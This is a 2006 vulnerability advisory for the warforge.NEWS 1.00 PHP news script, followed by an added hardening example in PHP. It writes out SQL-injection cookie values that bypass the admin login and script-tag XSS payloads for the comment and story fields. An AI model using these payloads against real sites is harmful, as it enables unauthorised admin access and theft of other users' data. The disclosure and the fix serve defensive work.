warforge.NEWS exploit
I've pasted it on: http://forum.zone-h.org/viewtopic.php?t=5468
-= warforge.NEWS =-
yamcho
April 26, 2006
SQL Injection
XSS
warforge.NEWS 1.00
warforge.NEWS is a script designed for easy use/implementation. It has a
full featured administration section and is powered by a mysql database.
SQL Injection
In the file authcheck.php there is a flaw that can allow a user to
log in as Admin.
The code is:
[…]
if(isset($_COOKIE["authaccess"]) || isset($_COOKIE["authusername"])) {
// This checks to make sure the username and password in the cookie are actual users,
// this checks everytime you load a page to prevent cookie spoofing
$usern = $_COOKIE["authusername"];
$pass = $_COOKIE["authpassword"];
mysql_connect($db_Host, $db_Username, $db_Pass);
mysql_select_db($db_Database);
$cookiecheck = mysql_query("SELECT * FROM $usertable WHERE username = '$usern' AND password = '$pass'");
[…]
So, if a remote user adds these cookies to his cookie list:
1)
authusername=ADMINUSERNAME'/*;
authpassword=null;
authfirst_name=null;
authlast_name=null;
authaccess=null;
authemail=null;
or this:
2)
authusername=null;
authpassword=' OR '1'='1;
authfirst_name=null;
authlast_name=null;
authaccess=null;
authemail=null;
The query will be:
1) SELECT * FROM $usertable WHERE username = 'ADMINUSERNAME'/*' AND password = '$pass'
2) SELECT * FROM $usertable WHERE username = '$usern' AND password = '' OR '1'='1'
The remote user is now logged in as Admin.
XSS
In the file news.php there is a flaw that can allow a user to
perform an XSS attack.
The code is:
[…]
if(isset($_GET["newcomment"]) == "yes") {
// This is where it processes the mysql to add a new comment
$name = $_POST["name"];
$email = $_POST["email"];
$title = $_POST["title"];
$comment = $_POST["comment"];
[…]
Some of these fields can be used for an XSS attack.
So, if a remote user enters this
><script>alert(document.cookies);</script>
into the 'Your Name', 'Title' or 'Comment' form fields, he can obtain
data from other users.
In the file newsadd.php there is a flaw that can allow a logged-in user to
perform an XSS attack.
The code is:
[…]
if(isset($_POST["addstory"]) == "1") {
// add the news post error checking blah blah
$title = $_POST["title"];
$author = $_COOKIE["authusername"];
$email = $_COOKIE["authemail"];
$newspost = $_POST["newspost"];
[…]
Some of these fields can be used for an XSS attack.
So, if a remote user enters this
<script>alert(document.coockies);</script>
into the 'Title' and/or 'Story' form fields, he can obtain data from other users.
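The following is an added example, not code from the advisory or from warforge.NEWS, showing how the authcheck.php query and the news.php/newsadd.php output would be hardened. It assumes PDO with MySQL, that $usertable has the username and password columns used above, that the password column stores a password_hash() digest rather than plaintext, and that login.php is the login page; the $db_* variable names are the ones the original code uses.

```php
<?php
// Added example (not the warforge.NEWS code): a hardened replacement for the
// cookie check in authcheck.php and for the echoed fields in news.php.
// Assumptions: PDO with MySQL, $usertable has columns username/password, and
// password stores a password_hash() digest (the original compares plaintext).

function connectDb(string $host, string $db, string $user, string $pass): PDO {
    $pdo = new PDO("mysql:host=$host;dbname=$db;charset=utf8mb4", $user, $pass);
    // Throw on error and use real server-side prepared statements.
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    return $pdo;
}

// Replaces the string-built "... WHERE username = '$usern' AND password = '$pass'"
// query. The username is bound as a parameter, so a value like ADMINUSERNAME'/*
// is matched literally instead of closing the string, and the password is
// checked in PHP against the stored hash, so ' OR '1'='1 cannot widen the query.
function checkCredentials(PDO $pdo, string $usertable, string $usern, string $pass): ?array {
    // A table name cannot be a bound parameter; accept only a plain identifier.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $usertable)) {
        throw new InvalidArgumentException('bad table name');
    }
    $stmt = $pdo->prepare("SELECT * FROM `$usertable` WHERE username = :u LIMIT 1");
    $stmt->execute([':u' => $usern]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($pass, $row['password'])) {
        return null; // unknown user or wrong password
    }
    unset($row['password']);
    return $row;
}

// For news.php / newsadd.php: encode user-supplied fields (name, title,
// comment, story) before echoing them into HTML, so "><script>..." is
// rendered as text rather than executed in other visitors' browsers.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Replacement for the authcheck.php snippet: same cookie names, but the login
// is accepted only when the prepared query and the hash check both succeed.
if (isset($_COOKIE['authusername'], $_COOKIE['authpassword'])) {
    $pdo = connectDb($db_Host, $db_Database, $db_Username, $db_Pass);
    $user = checkCredentials($pdo, $usertable, $_COOKIE['authusername'], $_COOKIE['authpassword']);
    if ($user === null) {
        header('Location: login.php'); // assumed login page; rejects spoofed cookies
        exit;
    }
}
```

Keeping the password itself in a cookie remains a weakness even with the query fixed; a server-side session identifier is the usual replacement for that design.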
yamcho
yamcho[at]email[dot]it